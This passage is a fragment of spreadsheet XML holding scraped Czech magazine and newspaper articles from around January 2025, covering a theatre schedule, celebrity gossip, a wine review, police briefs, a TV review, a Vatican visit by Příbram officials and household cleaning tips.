    <t>DIVADLO V CELETNÉ Celetná 17, Praha 1 , www.divadlovceletne.cz, 222 326 843, 608 327 107, rezervace@divadlovceletne.cz KAŠPAR 3. Dámská čtyřhra 5. FC Rudý lev 6. FC Rudý lev 9. Dámská čtyřhra 10. Jonáš a tingl-tangl 11. Jonáš a tingl-tangl 15.00 13. Vincenc 15. Rok na vsi 16. Rok na vsi 17. Cyrano 18. O políbeném drakovi 14.00 18. Cyrano 19. O políbeném drakovi 14.00 19. Terminus 22. Protokol 26. Osiřelý západ 27. Snímek 51 28. Život je sen 29. Mrzák inishmaanský 30. Cyrano Kašpar / KLUBOVNA 4. Dědeček premiéra 5. Kodaň 6. Kodaň 7. Plíce 8. Plíce 9. Já, Feuerbach 10. Audience + Vernisáž 11. Kytice 17.00 11. Draci noci 20.00 12. Simpatico 14. Vincenc 15. 2084 16. 2084 17. Slovácko sa nesúdí 18. Dědeček 19. Lebka z Connemary 20. Lebka z Connemary 21. Vincenc 22. Kodaň 23. Iluze 24. Eastwood 25. Dědeček 17.00 25. Draci noci 20.00 27. Politika správcovny 28. Politika správcovny 29. Plíce Kašpar / KOCHÁNKY 24. Protokol 25. Iluze 26. Iluze DIVADLO MA 4. Zimní kouzlo 15.00 4. Zimní kouzlo 16.30 KAMPAK 7. Celou noc venku DIVADLO NAHRANĚ 8. Paralelní vesmíry 20. Inkognito DIVADLO VERZE 11. Trenér 12. Úča musí pryč 15.00 12. Vina Vína Studio mladých umělců derniéra 19.30 23. Jméno 24. Vášnivost, Thriller 25. Úča musí pryč 16.00 25. Drazí rodiče LUKÁŠ ADAM &amp;amp; RICHARD PEKÁREK 14. Thrill Me SPOLEČNOST DR. KRÁSY 21. Valkýra Začátky představení v 19.30, není-li uvedeno jinak.</t>
  </si>
  <si>
    <t>20250101_446_3734721415_34e440e3f68f19a82338.html</t>
  </si>
  <si>
    <t>34e440e3f68f19a82338</t>
  </si>
  <si>
    <t>Listopadová Krása zralého věku</t>
  </si>
  <si>
    <t>Listopadová Krása zralého věku Karel Voříšek a Zuzana Stirská roztančili sál Tohle komorní sál ještě nezažil! Po přípitku francouzským vínem beaujolais (sponzorský dar) se začalo rozmotávat klubko dvouapůlhodinového programu. Kdo přišel, užil si. Kdo zaváhal, pochybil. Ano, krása života se projevila v plném rozsahu zkušeností, pohody a radosti z něj. Týká se nejen dříve narozených, ale i jejich doprovodů a mladší generace, která se přišla podívat. Zažili atmosféru, která je nepřenositelná. Mluvím o krásných aha momentech, na které se dlouho vzpomíná. Myšlenková linie se nesla v duchu: jaký koktejl myšlenek si v dané etapě života mixujeme, takový život i žijeme. A my jsme míchali! Rytmus pořadu se měnil podle typu vyprávění a písní, náladu jistila bohatá tombola, tanec byl závěrečnou tečkou. Děkuji všem aktérům: pozvaným umělcům, seniorům, krásnému mládí a sponzorům. Mým přáním je i nadále společně tvořit a žít krásu, kvůli které jsme se na tento svět narodili. Láskou se nechme navigovat, neboť s ní nikdy nešlápneme vedle. Je energií, která nás vrací zpět do harmonie. Vykročme s ní i do tohoto roku a věřme si. Dáme to. Hana M. Kunešová, autorka pořadu Aktivita byla podpořena z NDT Obec přátelská rodině a seniorům 2024.</t>
  </si>
  <si>
    <t>20250101_447_3734796727_eafcd218ad1723edadd6.html</t>
  </si>
  <si>
    <t>eafcd218ad1723edadd6</t>
  </si>
  <si>
    <t>PÁD DO TEMNOT</t>
  </si>
  <si>
    <t>20250101_448_3734808501_5583504f1056d320156c.html</t>
  </si>
  <si>
    <t>5583504f1056d320156c</t>
  </si>
  <si>
    <t>VLADIMÍR MERTA VZDÁLENÁ BLÍZKÁ (NEJISTÉ JISTOTY 2)</t>
  </si>
  <si>
    <t>20250101_449_3692507573_f5c6c7706169bb4535dc.html</t>
  </si>
  <si>
    <t>f5c6c7706169bb4535dc</t>
  </si>
  <si>
    <t>Návrat proutníka!</t>
  </si>
  <si>
    <t>Návrat proutníka! ADÉLA GONDÍKOVÁ (51) Zdálo se, že v českém showbyznysu jsou Adéla Gondíková (51) a Jiří Langmajer (58) jedním z nejstabilnějších párů. Hvězda Ulice měla bouřliváka Langmajera zkrotit a on se stal věrným manželem. Jenomže teď to vypadá, že sukničkář opět vystrkuje růžky. Na premiéře filmu Poklad se herec pořádně odvázal, dopřál si několik sklenek alkoholu a vřele políbil neznámou blondýnku. Fotografové ho ale načapali a Gondíkovou to prý vytočilo doběla. Podle jedné z verzí si herec dokonce koleduje o rozvod. Jestli by totiž Gondíková něco nepřekousla, pak je to nevěra. Vždyť její první manželství s Ondřejem Brouskem (43) skončilo právě kvůli tomu, že si našel za jejími zády jinou a ona se s tím dlouho nedokázala smířit. S Langošem sice moc dobře věděla, do čeho jde, a mnohdy to v začátcích jejich vztahu nebylo snadné, stačí si jen vzpomenout na dostaveníčko s mladou kolegyní Eliškou Křenkovou (34), ale pevně měla věřit, že se opravdu změnil. Teď bude mít asi co vysvětlovat. Langoš zase zlobí. Promine mu Adéla malý úlet?</t>
  </si>
  <si>
    <t>20250101_45_3704259689_00458d414488017cbe25.html</t>
  </si>
  <si>
    <t>00458d414488017cbe25</t>
  </si>
  <si>
    <t>Víno Chateau Radyně 2021, jakostní šumivé víno, Bohemia Sekt</t>
  </si>
  <si>
    <t>Víno Chateau Radyně 2021, jakostní šumivé víno , Bohemia Sekt /100 8. 12. 2024 „Křišťálově čiré víno , velmi světle žluté barvy se slámovými odlesky a středně dobrou viskozitou. Harmonická, čistá, velmi decentní jemná vůně přináší aroma postupně rozkvétající louky s medem či květovým nektarem, pak přichází lískový oříšek a velmi jemný nádech ušlechtilého dřeva i koření. Bohatá, středně plná, přitom ne však výrazná suchá chuť, pokračuje v jemnosti vůně, k tónům z buketu se přidává zelené jablko, lehce i citrusy a jemný nádech koření, připomínající pobyt v barikovém sudu. Citrusová kyselinka se snoubí se sladkým tříslem a medem v delším svěžím závěru.“ Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>20250101_450_3692508332_35c68818276eff22e042.html</t>
  </si>
  <si>
    <t>35c68818276eff22e042</t>
  </si>
  <si>
    <t>ZACVIČTE S KILY NAVÍC</t>
  </si>
  <si>
    <t>ZACVIČTE S KILY NAVÍC NOVÝ SERIÁL 1. díl V novém miniseriálu vám přinášíme tipy, jak dát sbohem nadbytečným kilům. Dnes se zaměříme na to, jak vlastně správně začít. Shodit pár kilo patří k nejčastějším novoročním předsevzetím. Zároveň je to i dost často slib, který se většinou nepodaří dodržet. Víme, co musíte udělat, aby to tentokrát klaplo. Mějte realistická očekávání Při ohlédnutí za minulým rokem toho bývá určitě hodně, co byste chtěla změnit. Jenže když si toho naberete moc, pravděpodobnost, že vytrváte, se zmenšuje. Snažit se najednou zhubnout, přestat kouřit a začít se hýbat, to zvládne jen málokdo. Jestli jste se rozhodla pro hubnutí, jako předsevzetí to úplně stačí. Měla byste si také udělat realistický plán. Snaha shodit za měsíc deset kilo je nesmyslná. Příliš rychlé hubnutí vede nejen k jo-jo efektu, ale může i vážně narušit váš metabolismus. Udělejte čistku spíže a lednice Hlavně zpočátku diety vás bude honit mlsná. Proto s dietou nezačínejte dřív, dokud nezmizí všechny sváteční dobroty. Pak udělejte důkladnou probírku spíže, lednice i mrazáku. Zbavte se nezdravých potravin, alkoholu a cukru. Naopak si nakupte zásoby oříšků, proteinových tyčinek, luštěnin, celozrnných těstovin a rybích konzerv. Tak budete mít vždy po ruce něco zdravého k jídlu.</t>
  </si>
  <si>
    <t>20250101_451_3692509289_e9a81f9da76bb117c4b4.html</t>
  </si>
  <si>
    <t>e9a81f9da76bb117c4b4</t>
  </si>
  <si>
    <t>Shrnutí KRIMI STŘÍPKY Z MĚSTSKÉ POLICIE Pachatel krádeže jízdního kola Dne 6. 11. 2024 v 1.45 hodin upozornil strážník obsluhující městský kamerový dohlížecí systém na muže, který se pohybuje kolem nádraží v blízkosti kolostavu. Strážníci na místě ztotožnili 26letého muže z Českého Těšína , který údajně čeká na vlak, aby mohl odcestovat. S největší pravděpodobností by neodjel z našeho města s prázdnou, kdyby na něho hlídka opětovně nenarazila – tentokrát v Masarykově ulici a již na jízdním kole. Šetřením bylo zjištěno, že jízdní kolo odcizil z nezajištěné garáže v Čechově ulici. Strážníci mu tak zajistili, že odcestoval do nedalekých Milovic , kam byl přivolanou hlídkou policie převezen na obvodní oddělení. Celostátně hledaná osoba Dne 8. 11. 2024 dostali strážníci informaci, že by se na území našeho města mohla zdržovat celostátně hledaná osoba. Mělo by se jednat o 34letého cizince, který se na našem území nějaký čas pohyboval. Bližší popis osoby ukázal, že tato osoba není strážníkům neznámá. Ti se proto vydali zkontrolovat místa, na kterých se tato osoba dříve zdržovala. Pečlivá práce se vyplatila a hledaná osoba byla na jednom z vytipovaných míst zadržena a následně předána přivolaným policistům. Alkohol za volantem Dne 24. 11. 2024 ve 2.30 hodin kontrolovali strážníci v ulici Československé armády 25letého cizince, který řídil osobní motorové vozidlo. Strážníky na sebe upozornil svým stylem jízdy. Strážníci na základě důvodného podezření provedli u řidiče dechovou zkoušku na přítomnost alkoholu , která dopadla s pozitivním výsledkem 2.50 ‰. Vzhledem k naměřené hodnotě byla na místo přivolána hlídka policie, která si výtečníka převezla na obvodní oddělení do Milovic . Druhý případ se stal 30. 11. 2024 krátce po 21.30, kdy strážníci projednávali přestupek v Jedličkově ulici s 40letým řidičem z Lysé. Dechová zkouška u řidiče potvrdila hodnotu 1,29 ‰. I v tomto případě putoval řidič na obvodní oddělení Policie ČR do Milovic . Sledujte naše webové stránky na adrese www.mplysa.cz, kde najdete další informace. Autor: Vrch. kom. Bc. Luboš Zita, velitel Autor person Luboš Zita</t>
  </si>
  <si>
    <t>20250101_452_3692506691_05dfb4f1ed2ae9c443cf.html</t>
  </si>
  <si>
    <t>05dfb4f1ed2ae9c443cf</t>
  </si>
  <si>
    <t>Receptury na kocovinu bývají pověry. Jeden však funguje, říká studie Jsou kreativní, mnohé nedovedou zastřít, že vycházejí z říše fantazie, jiné se však chlubí docela přesvědčivými vysvětleními. Věda je však k pestrým návodům, jak se vyhnout kocovině nebo umenšit její následky, skeptická. Dvě aktuální studie vynesly soud na dvěma z nich – jeden negativní, druhý pozitivní. Přepít alkohol vodou Pověr, které mají ochránit před kocovinou, je spousta. Jenže zaručený návod je jen jeden: vyhnout se popíjení. Mechanismus první zkoumané receptury zní přitom docela přesvědčivě. Vychází z faktu, že alkohol dehydruje, a úvahy, že když tedy uzavřeme večírek bohatýrským dílem vody nebo ho popíjením vody disciplinovaně prokládáme, uchráníme se trestu v podobě kocovinového dne. Práce Utrechtské univerzity, která vyšla v magazínu Alcohol , prověřila, zda takový přístup funguje. Její verdikt je zamítavý. Přesněji řečeno, proti dehydrataci ono doporučení funguje – jenže kocoviny nás nezbaví. Dehydratace a kocovina jsou totiž podle studie, jak shrnuje server Science Alert , dva následky konzumace alkoholu , které jsou souběžné, jenže navzájem nezávislé. Dehydratace kocovinu nezpůsobuje, takže povede-li se nám jí pitím vody vyhnout, rozhodně to neznamená, že nás kocovina obejde. A zatímco „kocovina je relativně trvalá, dehydratace je obvykle mírná a krátkodobá“. Konzumace vody během pití alkoholu nebo po něm podle výzkumů přinesla jen skromný účinek na prevenci kocoviny. A odhalilo se, že vlastně nezáleželo na množství vypité vody. Intenzita kocoviny a jejího repertoáru, například bolesti hlavy, nebyla závislá na tom, jakým množstvím vody se z prohýřené noci snažíme vyvinit. Druhá aktuální studie je pozitivnější, přináší naději, byť její doporučení není na okamžité použití. Autor: Tomáš Bratříček Autor person Tomáš Bratříček Rubrika transition_slide Xman - Styl</t>
  </si>
  <si>
    <t>20250101_453_3692506880_40c9e52d5efdc4e7c083.html</t>
  </si>
  <si>
    <t>40c9e52d5efdc4e7c083</t>
  </si>
  <si>
    <t>NEJDŘÍV SI MYSLELA, ŽE JE TO JEN rozmazlený s spratek</t>
  </si>
  <si>
    <t>NEJDŘÍV SI MYSLELA, ŽE JE TO JEN rozmazlený s spratek Vendula Pizingerová * 18. 2. 1972 &amp;amp; Josef Pizinger * 13. 10. 1987 Svého budoucího manžela poznala ještě jako jedenáctiletého kluka. Jednou ednou mu prý koupila dinosaura. O Vendule Pizingerové (52) se kdysi šuškalo, že se za svého prvního manžela provdala pro peníze. Brzy se ale ukázalo, že to nebyla pravda. Než konečně našla štěstí po boku Josefa Pizingera (37), musela si mnohokrát sáhnout na dno. Přímočará a za každých okolností upřímná Vendula Pizingerová (52) vždy trochu rozdělovala společnost, a to už od chvíle, kdy se jako mladá dívka poprvé objevila po boku hudebního skladatele Karla Svobody (†68). Ti dva se poprvé setkali v sekretariátu Strany podnikatelů, kde o víc než třicet let mladší Vendula pracovala. Dokázala vrátit Karla do života Tehdy Svoboda prožíval opravdu těžké časy. V roce 1993 mu totiž zemřela na rakovinu první žena Hana (†48). Skladatel i jeho dvě děti se dlouho nedokázali s její ztrátou vyrovnat. A právě v tu chvíli se na scéně objevila bezprostřední Vendula, která díky svému mládí a nakažlivému optimismu vrátila Karla do života. Vzali se v roce 1995 a jen o rok později se jim narodila dcera Klára (†4). V té době všichni Vendulu podezírali, že víc než Karla miluje jeho úspěch a peníze. Čas ukázal, že to nebyla pravda. Z bezstarostné mladé ženy se po těžkých ranách osudu stala silná žena, která při svém manželovi stála v dobrém i ve zlém. Jejich manželství utrpělo velkou ránu Malá Klárka totiž ve dvou letech onemocněla leukémií a dva dlouhé roky s touto krutou chorobou bojovala. Vendula jí byla celou dobu nablízku a většinu času s ní trávila v nemocnici. Když Klárka v srpnu roku 2000 zemřela, musela být Vendula statečná i pro svého o tolik staršího muže a pro své rodiče. Manželství Karla a Venduly však utrpělo velkou ránu, a u Karla se navíc poprvé objevily deprese. Už nedokázal být znovu tím silným mužem, o kterého se ostatní mohou opřít. Sám se velmi trápil, a tak není divu, že měl pocit, že život pro něj definitivně skončil. Často se hovořilo o jeho nevěrách Zoufalí manželé se tak brzy stali vděčným soustem pro novináře i širokou veřejnost. Každý z nich se totiž se situací vyrovnával po svém. Často se hovořilo o Karlových nevěrách a o pití jeho mladé manželky. Oba se snažili těžkou životní etapu přežít po svém a vzájemně se velmi odcizili. Brzy se dokonce šeptalo, že se Svoboda za svoji druhou ženu ve společnosti styděl. Prý nebyla tak elegantní a vzdělaná jako jeho první manželka Hana. Kromě toho si Vendula nerozuměla s Karlovými přáteli, protože byli o celou generaci starší než ona. Napsal pro ni krásnou píseň Brzy se začalo hovořit o tom, že jejich manželství dospělo k trpkému konci a že Svoboda podal žádost o rozvod. Mezitím Vendula ze všech sil bojovala nejen o Karlovu lásku, ale i o své místo ve společnosti. Aby pomohla ostatním trpícím dětem a jejich rodičům, založila v srpnu roku 2002 nadaci Kapka naděje. Během této doby se z mladé zoufalé ženy stala elegantní, sebejistá a příjemná dáma, která našla své životní poslání. Není divu, že si skladatel uvědomil, jak moc svou manželku miluje. Svoboda dokonce pro Vendulu napsal krásnou píseň Ještě že tě lásko mám. Deprese udeřily v plné síle V roce 2003 mu Vendula na oplátku zorganizovala v pražské Lucerně opulentní oslavu jeho pětašedesátých narozenin. Když se v roce 2005 narodil jejich syn Jakub (19), Vendula byla přesvědčená, že to nejhorší už má za sebou. Bohužel opak byl pravdou. Brzy se totiž ukázalo, že všechna prožitá utrpení si na Svobodovi vybrala krutou daň. Ačkoli se vedle své mladé a teď zase spokojené ženy skutečně snažil být šťastný, už to zkrátka nešlo. Ráno prý neměl sílu, a vlastně ani touhu vstát, pracovat a vídat se s ostatními lidmi. Cítil se věčně unavený, a tak se začal uzavírat do jevanské samoty. Jeho deprese znovu udeřily v plné síle a prý začal léky kombinovat s alkoholem . Musela žít pro svého malého syna Přesto zpráva o tom, že Karel Svoboda spáchal 28. ledna 2007 sebevraždu, zasáhla českou veřejnost jako blesk z čistého nebe. Ovšem nejstrašnější to muselo být pro jeho ženu, která ho tenkrát našla mrtvého na zahradě jejich domu v Jevanech. Ačkoli se jí během jednoho okamžiku zhroutil celý svět, musela dál žít pro malého syna Jakuba. Statečná Vendula se snažila ze všech sil. Přesto, že ji stíhala rána za ranou a veřejnost ji málem ukamenovala. Lidé, kteří ji sotva znali, ji totiž vinili z Karlovy smrti. Zbytečně se také hovořilo o tom, kolik toho po svém muži zdědila, jako by na tom v tu chvíli nějak zvlášť záleželo. Znovu zatoužila po lásce Ona se to snažila nevnímat a dál ze všech sil pracovala pro svoji nadaci Kapka naděje a její práce přinášela ovoce. Také pochopila, že i ona si zaslouží lásku, a v roce 2009 se provdala za svého tehdejšího přítele, obchodníka s nábytkem Patrika Auše (47). Brzy se ale ukázalo, že toto manželství bylo typickým šlápnutím vedle. Po třech letech následoval rozvod, který z Venduly opět udělal svobodnou dámu, toužící po partnerském štěstí. Tehdy jí osud přivál do cesty sympatického Josefa Pizingera (37), kterého před lety znávala ještě jako jedenáctiletého kluka, když chodila na kávu či skleničku k jeho mamince, své kamarádce. Vzájemné sympatie přišly až později A neměla o něm zrovna valné mínění, považovala ho totiž za rozmazleného spratka. „Měl rád nože, tak jsem mu je kupovala. Jednou dostal dinosaura, to jsem se nějak utrhla,“ vzpomínala Vendula s úsměvem v jednom rozhovoru. I Josef se později přiznal, že mu Vendula nebyla příliš sympatická. To se ale v průběhu následujících let mělo změnit. Když mu bylo dvacet pět let a Vendule o šestnáct víc, začali spolu chodit. Jak Pizingerová později přiznala, začátky jejich vztahu nebyly vůbec jednoduché. „První rok jsem se styděla jenom s ním jít po ulici. Ne za něj, ale za sebe,“ řekla dokonce. Je z ní spokojená vdaná paní Vendula naštěstí brzy pochopila, že nedělá nic špatného. Zkrátka se zamilovala do muže, který by ji samou láskou nosil na rukou. V jejich vztahu byly od začátku rozdané všechny karty. Vendula dokonce řekla, že kdyby Josef toužil po dvacetileté modelce, tak s takovou bude chodit, jenže on miluje právě ji. Aby dokázal, že je jeho láska upřímná, požádal ji během výletu do Španělska o ruku. V září 2015 následovala tajná svatba, která z ženy bojující o každou hezkou chvíli udělala šťastnou paní Pizingerovou . V jejich domově sídlí láska, radost a štěstí Báječná Vendula Pizingerová se už dávno stala vzorem pro mnoho českých žen. Nikdy si na nic nehraje, užívá si každou vteřinu svého života, stále stojí v čele své nadace Kapka naděje, a dokonce v říjnu 2020 přivedla na svět syna Pepíčka (4), který dostal jméno po svém hrdém otci. Navzdory všem škarohlídům, kteří poukazovali na její věk, Vendulu mateřství naplňuje a dodává jí energii. Všichni tvoří spokojenou rodinu, a v jejich krásném domově v Říčanech tak sídlí láska, radost a štěstí. Milovali se, ale jejich vztah nebyl vůbec snadný. Syn Jakub studuje obor veterinární specialista. Oba milují adrenalin a rádi podnikají dobrodružné cesty. „První rok jsem se strašně styděla jenom s ním jít po ulici. Ne za něj, ale za sebe.“ Šestnáctiletý věkový rozdíl je dnes už vůbec netrápí. Karla Svobodu si brala za muže v roce 1995. O rok později se jim narodila dcera Klárka. V roce 2020 se jim narodil syn.</t>
  </si>
  <si>
    <t>20250101_454_3692507582_d198bd3275efa4c6a29c.html</t>
  </si>
  <si>
    <t>d198bd3275efa4c6a29c</t>
  </si>
  <si>
    <t>GLOSA: Místo slonů pár lidí. Televizní silvestr měl hodně dlouhé fousy</t>
  </si>
  <si>
    <t>GLOSA: Místo slonů pár lidí. Televizní silvestr měl hodně dlouhé fousy Ne že by člověk od silvestrovské televize čekal zrovna zázraky, ale když se nedostaví ani náznak nápadu, natož změny, dá se mluvit o kocovině z nadměrné konzumace letité zábavy s prošlým datem spotřeby. U takzvaných speciálů silvestrovské mozaiky napříč stanicemi se stačí podívat na jejich rodokmeny. Pořad Tele Tele , který se vrátil na Novu pro jediný večer, se vysílal od roku 2000 po sedm let. Také ČT vařila z pamětnických přísad, Všechnopárty je na světě od roku 2005, Zázraky přírody od roku 2009. Prima Partička existuje v různých podobách od roku 2011, pořad Sejdeme se na Cibulce se vrátil na TV Barrandov poté, co tu startoval roku 2013. Relativní nováčci, tituly Novy Na lovu a Inkognito na Primě, se zrodily v roce 2021. A nejmladší ze silvestrovských rubrik, letošní hra Novy Možné je všechno!, se dosud nedostala nad půl milionu diváků. Jediným pravým nováčkem tak byla Muzikálová noc plná hvězd na ČT, ovšem nejen její návrat do slánského divadla, kde točil své koncerty Karel Gott , nostalgii též nezapře. Jak sváteční recyklace dopadly? Všedně. Dětinská recese s únosem moderátorů zpráv, aby za ně po letech naskočilo pirátské vysílání Tele Tele , víc slíbila než přinesla. Parodické kvarteto dodalo jen rámec pro obvyklý sestřih trapasů politiků, reportérů a herců či obehranou imitaci exprezidentů Klause a Zemana. 12 fotografií Navíc nových skečů včetně ulepené variace na repliku „Tak co, sporťáku, už máš chlapa?“ bylo pramálo, neboť také Tele Tele těžilo z vlastních archivů, takže kdyby se rovnou reprízovaly celé původní díly, divák by se necítil podveden. Mimo jiné se přebrepty či spíše hrubosti roku dotkly i soutěže Na lovu, která pak převzala štafetu: vcelku šlo o běžné vydání s celebritami a s výhrou určenou na charitu, které rozsvítil pouze Marek Taclík přiznáním, že mu coby adresáta dobročinného daru zamítli fotbalový klub v Teplicích . Většina pořadů se pak držela typu komorních potlachů před publikem. Výborná show se věnovala výhradně vzpomínání na Pelíšky, tedy veselým historkám z natáčení proložených ukázkami; vznikla poněkud opožděná reklama na štědrovečerní film. Stejně usedlý model zvolil pořad Sejdeme se na Cibulce, v němž se Aleš Cibulka coby hostitel dopustil mile nekorektní poznámky ohledně věku publika, které debata o vhodném datu početí pro narozeniny na Silvestra už sotva zajímá. Mimochodem Cibulka byl současně hostem Zázraků přírody, kde se „statečně“ řešil alkohol a sex, příroda až v poslední řadě. Národ se obohatil o poznatek, že pandu milování nezajímá, což jím muselo otřást víc než odhalení jiné stanice, že Daniela se stala devátou vyřazenou účastnicí Bachelora. Popravdě celý princip novodobých silvestrů shrnulo spolehlivé Inkognito, kde Libor Bouček prohodil, že někdejší velkolepé estrády se slony teď musí zastat šest lidí, Jakub Prachař podotkl, že Vladimír Menšík na to stačil sám, a Richard Genzer sebeironicky dodal: „Kam přepneš, tam vyskočím“. Prima Partička a Možné je všechno! sdílejí shodný princip improvizace, který u nás zvládá asi právě tolik herců, kolik jich dva pořady spotřebují. Plnění úkolů se lišilo jen pojetím svátečnosti, Možné je všechno! nasadilo paruky, kloboučky či čertovské růžky obecenstvu, Partička oblékla veselé ponožky aktérům. Častý vítěz silvestrovské sledovanosti Všechnopárty se experimentům vyhýbá až úzkostlivě včetně volby hostů. Miroslav Donutil i Osmany Laffita už u Karla Šípa zdomácněli, ani písničkář Pokáč tam nebyl poprvé a písnička stvořená podle slov zadaných publikem dávno není objevem. Zkrátka všechny pořady s datem 31. prosince měly tááákhle dlouhé fousy žánrové manýry a žádný z nich nenesl punc výjimečnosti, pro který by se nemohl vysílat nikdy jindy během roku než právě a pouze na silvestra. Ne že by se snad stýskalo po nazdobených estrádách s normalizačním komunálním humorem a prkenným baletem, které připomnělo muzikálové finále. Ale před půlnocí, na sklonku veškerého pospolitého plkání, se leckdo přistihl při kacířské myšlence, že teď by možná bral i toho slona. Silvestrovská Všechnopárty Autor: ČT Silvestrovské Zázraky přírody Autor: ČT Nova vsadí na silvestrovské noviny ve stylu Tele Tele Autor: TV Novaq Silvestrovské TN - policejní zásah Autor: TV Nova Silvestrovský pořad Sejdeme se na Cibulce Autor: TV Barrandov Silvestrovské TN - Tele Tele je zpátky Autor: TV Nova Silvestrovské TN Autor: TV Nova Muzikálová noc plná hvězd Autor: ČT Nova vsadí na silvestrovské noviny ve stylu Tele Tele Autor: Mirka Spáčilová Autor Mirka Spáčilová Rubrika transition_slide Kultura - Film/TV</t>
  </si>
  <si>
    <t>20250101_455_3692507560_165bba47382813b8cc8a.html</t>
  </si>
  <si>
    <t>165bba47382813b8cc8a</t>
  </si>
  <si>
    <t>Příbramský dar pro papeže</t>
  </si>
  <si>
    <t>Příbramský dar pro papeže Rubrika: PARTNERSTVÍ O víkendu 7. a 8. prosince 2024 se zúčastnila devítičlenná skupina zástupců města Příbram významné návštěvy ve Vatikánu , která se uskutečnila díky dlouhodobým vazbám města s italskou oblastí Valle di Ledro. Naše partnerská oblast letos ozdobila hlavní vánoční strom na Svatopetrském náměstí . K nazdobení jednoho z dalších 39 stromů byla oslovena i Příbram . Ručně malované skleněné ozdoby s motivy městského znaku, Svaté Hory a Hornického muzea na „příbramský“ strom byly vytvořeny speciálně pro tuto příležitost ve společnosti Ozdoba ze Dvora Králové . NÁVŠTĚVA ZÁSTUPCŮ MĚSTA VE VATIKÁNU Díky dlouholeté spolupráci mezi Příbramí a Valle di Ledro bylo naše město přizváno k účasti na prestižní adventní události, která zahrnovala jedinečnou audienci u papeže a slavnostní rozsvícení vánočního stromu. Program začal v sobotu dopoledne společným setkáním s papežem Františkem v papežské audienční síni, známé jako Sál Pavla VI. nebo Nerviho sál. Během audience předal starosta města Příbram Jan Konvalinka papeži Františkovi dar za všechny Příbramany – ručně vyřezávanou sošku Panny Marie Svatohorské, která představuje tradiční řezbářskou lidovou tvorbu z Příbramska . „Byl to nezapomenutelný zážitek a velká čest setkat se se Svatým Otcem. Až do příletu do Říma jsme netušili, zda se setkání opravdu uskuteční. Nakonec jsme byli usazeni do předních lavic v Nerviho sále, kde jsme čekali na příchod papeže. Po krátké promluvě se pozdravil s hosty, mezi kterými jsem byl i já s panem místostarostou Karpíškem. Svatému Otci jsem stiskl ruku a několika italskými větami vyjádřil úctu a radost ze setkání,“ popsal návštěvu Vatikánu příbramský starosta. A dodal: „Přitom jsem zmínil, že přináším dar z Příbrami , z České republiky . Na zabalenou krabici se zvídavě podíval, tak jsem ještě dodal, že uvnitř je dřevěná soška Panny Marie. Usmál se a spolu se svým doprovodem se posunul k dalším hostům. Chvíli jsem jen seděl a vnímal, jak velkou chvíli jsme zažili. Taky jsem měl radost z toho, že jsem v té veliké nervozitě ze sebe vysoukal smysluplné věty v jazyce, kterým vládnu jen velmi málo.“ Pokud jde o protokol, bylo striktně dáno, jaké má být oblečení. „Muži tmavý oblek, ženy sukně pod kolena, tmavé barvy a z neprůsvitného materiálu. Měl jsem na sobě také slavnostní insignii města Příbram se znakem a hornickými motivy. Jsem opravdu rád, že jsme takto důstojně reprezentovali naše město. Velký dík za tuto příležitost náleží našim přátelům z Valle di Ledra,“ dodal starosta. V podvečer došlo na náměstí sv. Petra k slavnostnímu rozsvícení 29metrového vánočního stromu a odhalení betlému, který tradičně zachycuje lokální prvky dané oblasti a letos připomíná život rybářů. Kulturu Valle di Ledra přiblížilo také večerní vystoupení mužského pěveckého sboru Coro Cima d’Oro v kostele Santa Maria degli Angeli. V neděli se zástupci města zúčastnili mše svaté v majestátní katedrále sv. Petra. POUTO STARÉ VÍCE NEŽ STO LET Město Příbram spojuje s italským Valle di Ledro společná pohnutá historie, která se váže k začátku 20. století. Dne 23. května roku 1915 vypovědělo Italské království válku Rakousku- Uhersku . Rakouské úřady okamžitě vydaly příkaz k evakuaci 75 000 civilních osob z Tridentska do bezpečnějšího vnitrozemí monarchie. Týkalo se to také asi tří tisíc žen, dětí a starých lidí z alpského údolí poblíž jezera Ledro. Dne 25. května 1915 vlaky přivezly vystěhovalce do Příbrami . Přijelo jich asi 400. Přes počáteční nedůvěru místních byli Ledrenští nakonec díky své pracovitosti, skromnosti a zbožnosti dobře přijati. Na přijetí Ledrenští po návratu do vlasti často vzpomínali. Některé české a italské rodiny spolu udržují přátelství i po více než sto letech. V roce 2023 jsme v Příbrami na počest partnerství otevřeli u Čekalíkovského rybníku Park Valle di Ledro a naopak u Ledrenského jezera v obci Pieve je po našem městě pojmenována jedna ulice. Papež František Vánoční strom na Svatopetrském náměstí Příbramský starosta Jan Konvalinka měl šanci promluvit s papežem Františkem. Foto (4×): město Příbram Autor: Zuzana Kučerová Městský úřad Příbram Autor person Zuzana Kučerová Městský Rubrika transition_slide PARTNERSTVÍ</t>
  </si>
  <si>
    <t>20250101_456_3692508555_80ad03f16debc498acf0.html</t>
  </si>
  <si>
    <t>80ad03f16debc498acf0</t>
  </si>
  <si>
    <t>Vylitý vosk, káva či skvrny od vína: Zapamatujte si, jak se jich zbavit</t>
  </si>
  <si>
    <t>Vylitý vosk, káva či skvrny od vína : Zapamatujte si, jak se jich zbavit Stane se to raz dva. Stačí neopatrný pohyb a máte skvrnu na sedačce, vosk na ubrusu a zápach v celém bytě. Co s tím? Víc než kdy jindy se teď setkáváte, popíjíte a dáváte si dobroty. S tím se zvyšuje i pravděpodobnost, že se něco někde vylije či zašpiní. Jak na případné karamboly? Máme pro vás pár tipů, jak se jich bez následků zbavit. Vosk na ubrusu Svítit svíčkou je příjemné a romantické, vosk ale někdy ukápne tam, kam nemá. Co s tím? Látku vložte mezi dva savé papíry a přežehlete. Zbytky dodatečně ošetřete lihem či technickým benzinem. Skvrna na koberci Cokoli vám upadne na koberec, místo co nejrychleji vysušte papírovými utěrkami nebo kapesníčky a polijte ho sodovkou, perlivou vodou či minerálkou. Bublinky dokážou uvolnit špínu vsáknutou do vláken. Po chvilce místo opět vysušte. Pokud na koberci zůstanou patrné mapy, vyčistěte je houbičkou a mýdlovou vodou. Vystříknutá káva Jakmile lahodný kofein opustí hrneček a neskončí ve vašem žaludku, ale jinde, hned látku namočte do studené a osolené vody a pak vyperte v mýdlové vodě. Na koberec použijte sodovku, nechte chvíli působit, vysušte, případně dočistěte lihem. Zápach v bytě Asi málokdo touží po tom, aby slavnostní dny doprovázel odér z vaření, pečení či smažení. Zbavíte se ho tak, že na plotně necháte chvíli vařit vodu s octem , do které přidáte lžičku skořice . Úplně mu předejdete už tím, když do pekáče přidáte rozkrojené jablko , které při pečení zápach pohltí. Rozlité červené víno Pokud k nepříjemné nehodě dojde někde v bytě nebo třeba v restauraci, vezměte si co nejrychleji na pomoc obyčejnou kuchyňskou sůl. Budete jí potřebovat tolik, abyste skvrnu 